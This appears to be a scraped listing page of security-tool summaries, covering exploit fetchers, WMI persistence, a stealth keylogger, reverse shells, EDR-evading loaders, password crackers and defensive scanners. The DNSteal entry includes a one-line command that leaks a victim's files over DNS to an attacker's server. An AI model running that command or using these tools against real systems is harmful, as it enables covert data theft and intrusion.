AutoLocalPrivilegeEscalation - An automated script that download potential exploit for linux kernel from exploitdb, and compile them automatically

An automated script that download potential exploit for linux kernel from exploitdb, and compile them automatically This script is created due to Hackademics, there are so much possible exploit for that version of kernel, as a rookie OSCP student, I am not able to find out the correct exploit, al...

PowerLurk - Malicious WMI Events using PowerShell

PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information:...

WifiChannelMonitor - Monitor APs and Wifi clients on selected channel (Monitor Mode) for Window

WifiChannelMonitor is a utility for Windows that captures wifi traffic on the channel you choose, using Microsoft Network Monitor capture driver in monitor mode, and displays extensive information about access points and the wifi clients connected to them. WifiChannelMonitor also allows you to vi...

Whitewidow - SQL Vulnerability Scanner

Whitewidow is an open source automated SQL vulnerability scanner, that is capable of running through a file list, or can scrape Google for potential vulnerable websites. It allows automatic file formatting, random user agents, IP addresses, server information, multiple SQL injection syntax, and a...

Whatportis - A Command To Search Port Names And numbers

It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port. Usage This tool allows you to find what port is associated with a service: $ whatportis redis...

SpiderFoot v2.6.1 - Open Source Intelligence Automation

SpiderFoot is an open source intelligence automation tool. Its goal is to automate the process of gathering intelligence about a given target. Purpose There are three main areas where SpiderFoot can be useful: 1. If you are a pen-tester, SpiderFoot will automate the reconnaisance stage of the tes...

Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management

Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an...

Pupy - Multi-Platform Remote Administration Tool

Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk. Features : On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy doe...

Windows Spy Keylogger - Software to Log Keystrokes in Stealth Mode for 32-bit/64-bit processes on Windows XP/Vista/7/8/10

Windows Spy Keylogger is the free software to help you covertly monitor all activities on your computer. It intercepts everything that is typed on keyboard and stores into one log file which you can view it anytime later. You can track logins , passwords , emails , chats and all other secret thin...

DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below is an image showing an example of how to use: On the victim machine, you simply can do something like so: for b in $xxd -p file/to/send.png; do dig @server $b.filename.com; done...

ZAP 2.4.2 - Penetration Testing Tool for Testing Web Applications

The Zed Attack Proxy ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testin...

ShellCheck - Automatically Detects Problems with sh/bash Scripts and Commands

ShellCheck is a static analysis and linting tool for sh/bash scripts. It's mainly focused on handling typical beginner and intermediate level syntax errors and pitfalls where the shell just gives a cryptic error message or strange behavior, but it also reports on a few more advanced issues where...

FastNetMon - Very Fast DDoS Analyzer with Sflow/Netflow/Mirror Support

A high performance DoS/DDoS load analyzer built on top of multiple packet capture engines NetFlow, IPFIX, sFLOW, netmap, PFRING, PCAP. What can we do? We can detect hosts in our own network with a large amount of packets per second/bytes per second or flow per second incoming or outgoing from...

Password Cracking Suite

How To Use It: git clone https://github.com/TecnoHack/Password-Cracking-Suite.git chmod +x csuit.py ./csuit.py Dics Path: In this path, you can add any dictionary you would like to use. Tools Path: In this path, the script will install 3rd party tools. You can download some here:...

Zarp - Local Network Attack Framework

Zarp is a network attack tool centered around the exploitation of local networks. This does not include system exploitation, but rather abusing networking protocols and stacks to take over, infiltrate, and knock out. Sessions can be managed to quickly poison and sniff multiple systems at once,...

Netsparker v3.5 - Web Application Security Scanner

Netsparker Web Application Security Scanner can find and report web application vulnerabilities such as SQL Injection and Cross-site Scripting XSS and security issues on all web applications and websites regardless of the platform and the technology they are built on. Netsparker is very easy to u...

BluetoothLogView - Creates a log of Bluetooth devices activity around you

BluetoothLogView is a small utility that monitors the activity of Bluetooth devices around you, and displays a log of Bluetooth devices on the main window. Every time that a new Bluetooth device arrives to your area and when the device leaves your area, a new log line is added with the following...

oclHashcat v1.20 - Worlds fastest password cracker

oclHashcat is a GPGPU-based multi-hash cracker using a brute-force attack implemented as mask attack, combinator attack, dictionary attack, hybrid attack, mask attack, and rule-based attack. This GPU cracker is a fusioned version of oclHashcat-plus and oclHashcat-lite. GPU Driver requirements: NV...

[Firefox Password Remover v1.5] Firefox Website Login Password Removal Tool

Firefox Password Remover is the free tool to quickly remove the stored website login passwords from Firefox. You can either remove selected ones or all of the stored passwords from the Firefox sign-on database. One of the unique feature of this tool is that it allows you to remove the website...

[SSLSmart] Smart SSL Cipher Enumeration

SSLSmart is a highly flexible and interactive tool aimed at improving efficiency and reducing false positives during SSL testing. A number of tools allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is performed b...

[OMENS v1.17] The framework for distributing Actionable Intelligence

OMENS Object Monitor for Enhanced Network Security was born out of the intrusion and intrusion attempts analysis that I have been doing over many years. I consistently run into intrusion attempts that existing IDS systems have difficulty detecting. OMENS is my attempt to better detect and...

[oclHashcat-plus v0.15] Advanced Password Recovery

This version is the result of over 6 months of work, having modified 618,473 total lines of source code. Before we go into the details of the changes, here's a quick summary of the major changes: Added support for cracking passwords longer than 15 characters Added support for mask-files, which...

[Drozer] The Leading Security Testing Framework for Android.

drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a droze...

[RIPS] A static source code analyser for vulnerabilities in PHP scripts

RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks potentially vulnerable functions that can be tainted b...

[Gmail Password Dump] Command-line Tool to Recover Google Password

Gmail Password Dump is the command-line tool to instantly recover your lost gmail password from various Google applications as well as popular web browsers and messengers. Currently it can recover your Gmail password from following applications, Google Talk Google Picassa Google Desktop Seach Gma...

[MSF-Installer] Script to Automate Metasploit Framework Installation

Script to help with installing and configuring Metasploit Framework, Armitage and the Plugins I have written on OSX and Linux To use the script on OSX Java, Xcode and Command Development Tools from Xcode must be installed before running the script. In the case of OSX I also added the option of...

[BackBox Linux] Version 3.0

BackBox is a Linux distribution based on Ubuntu Desktop, and designed for performing penetration testing, incident response, computer forensics, and intelligence gathering. It uses the Xfce desktop environment, and is developed by Raffaele Forte and a small but dedicated team. This release includ...

Lazywarden - Automatic Bitwarden Backup

Secure, Automated, and Multi-Cloud Bitwarden Backup and Import System Lazywarden is a Python automation tool designed to Backup and Restore data from your vault, including Bitwarden attachments. It allows you to upload backups to multiple cloud storage services and receive notifications across...

Nemesis - An Offensive Data Enrichment Pipeline

Nemesis is an offensive data enrichment pipeline and operator support system. Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments. Nemesis aims to automate a number of...

Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes

Find authentication authn and authorization authz security bugs in web application routes: Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue: 2021 OWASP Top 10 1 - Broken...

JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files. Prerequisites Before installing JSpector, you need to have Jython installed on Burp Suite. Installation 1. Download the late...

Caracal - Static Analyzer For Starknet Smart Contracts

Caracal is a static analyzer tool over the SIERRA representation for Starknet smart contracts. Features Detectors to detect vulnerable Cairo code Printers to report information Taint analysis Data flow analysis framework Easy to run in Scarb projects Installation Precompiled binaries Precompiled...

HTTP-Shell - MultiPlatform HTTP Reverse Shell

HTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a...

Acltoolkit - ACL Abuse Swiss-Knife

acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses. Installation pip install acltoolkit-ad or git clone https://github.com/zblurx/acltoolkit.git cd acltoolkit make Usage usage: acltoolkit -h -debug -hashes LMHASH:NTHASH -no-pass -k -dc-ip ip address -scheme ldap scheme...

Graphcat - Generate Graphs And Charts Based On Password Cracking Result

Simple script to generate graphs and charts on hashcat and john potfile and ntds Install git clone https://github.com/Orange-Cyberdefense/graphcat cd graphcat pip install . Helper $ graphcat.py -h usage: graphcat.py -h -potfile hashcat.potfile -hashfile hashfile.txt -john -format FORMAT...

Hades - Go Shellcode Loader That Combines Multiple Evasion Techniques

Hades is a proof of concept loader that combines several evasion technques with the aim of bypassing the defensive mechanisms commonly used by modern AV/EDRs. Usage The easiest way, is probably building the project on Linux using make. git clone https://github.com/f1zm0/hades && cd hades make The...

KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective

KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9. Usage The GIF below...

GVision - A Reverse Image Search App That Use Google Cloud Vision API To Detect Landmarks And Web Entities From Images, Helping You Gather Valuable Information Quickly And Easily

GVision is a reverse image search app that use Google Cloud Vision API to detect landmarks and web entities from images, helping you gather valuable information quickly and easily. About Google Cloud Vision API Google Cloud Vision API is a machine learning-powered image analysis service that...

CMLoot - Find Interesting Files Stored On (System Center) Configuration Manager (SCCM/CM) SMB Shares

CMLoot was created to easily find interesting files stored on System Center Configuration Manager SCCM/CM SMB shares. The shares are used for distributing software to Windows clients in Windows enterprise environments and can contains scripts/configuration files with passwords, certificates pfx,...

Slicer - Tool To Automate The Boring Process Of APK Recon

A tool to automate the recon process on an APK file. Slicer accepts a path to an extracted APK file and then returns all the activities, receivers, and services which are exported and have null permissions and can be externally provoked. Note : The APK has to be extracted via jadx or apktool...

Matano - The Open-Source Security Lake Platform For AWS

Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed...

NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy

Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls. The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included i...

Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative

ropr is a blazing fast multithreaded ROP Gadget finder What is a ROP Gadget? ROP Return Oriented Programming Gadgets are small snippets of a few assembly instructions typically ending in a ret instruction which already exist as executable code within each binary or library. These gadgets may be...

Puwr - SSH Pivoting Script For Expanding Attack Surfaces On Local Networks

Easily expand your attack surface on a local network by discovering more hosts, via SSH. Using a machine running a SSH service, Puwr uses a given subnet range to scope out IP's, sending back any successful ping requests it has. This can be used to expand out an attack surface on a local network, ...

Hakoriginfinder - Tool For Discovering The Origin Host Behind A Reverse Proxy. Useful For Bypassing Cloud WAFs!

Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies. How does it work? This tool will first make a HTTP request to the hostname that you provide and store the response, then it will make a request to every IP address that you provide vi...

Pocsploit - A Lightweight, Flexible And Novel Open Source Poc Verification Framework

pocsploit is a lightweight, flexible and novel open source poc verification framework Pain points of the POC framework in the market 1. There are too many params, I don't know how to get started, but only some of them are commonly used. 2. YAML poc frameworklike nuclei & xray is not flexible...

DDexec - A Technique To Run Binaries Filelessly And Stealthily On Linux Using Dd To Replace The Shell With Another Process

In Linux in order to run a program it must exist as a file, it must be accessible in some way through the file system hierarchy this is just how execve works. This file may reside on disk or in ram tmpfs, memfd but you need a filepath. This has made very easy to control what is run on a Linux...

Request_Smuggler - Http Request Smuggling Vulnerability Scanner

Based on the amazing research by James Kettle. The tool can help to find servers that may be vulnerable to request smuggling vulnerability. Usage USAGE: requestsmuggler OPTIONS --url FLAGS: -h, --help Prints help information -V, --version Prints version information OPTIONS: --amount-of-payloads...

CodeAnalysis - Static Code Analysis

Tencent Cloud Code Analysis TCA for short, code-named CodeDog inside the company early is a comprehensive platform for code analysis and issue tracking. TCA consist of three components, server, web and client. It also supports the integration of other code analysis tools. Code analysis is a...

DRAKVUF Sandbox - Automated Hypervisor-Level Malware Analysis System

DRAKVUF Sandbox is an automated black-box malware analysis system with DRAKVUF engine under the hood, which does not require an agent on guest OS. This project provides you with a friendly web interface that allows you to upload suspicious files to be analyzed. Once the sandboxing job is finished...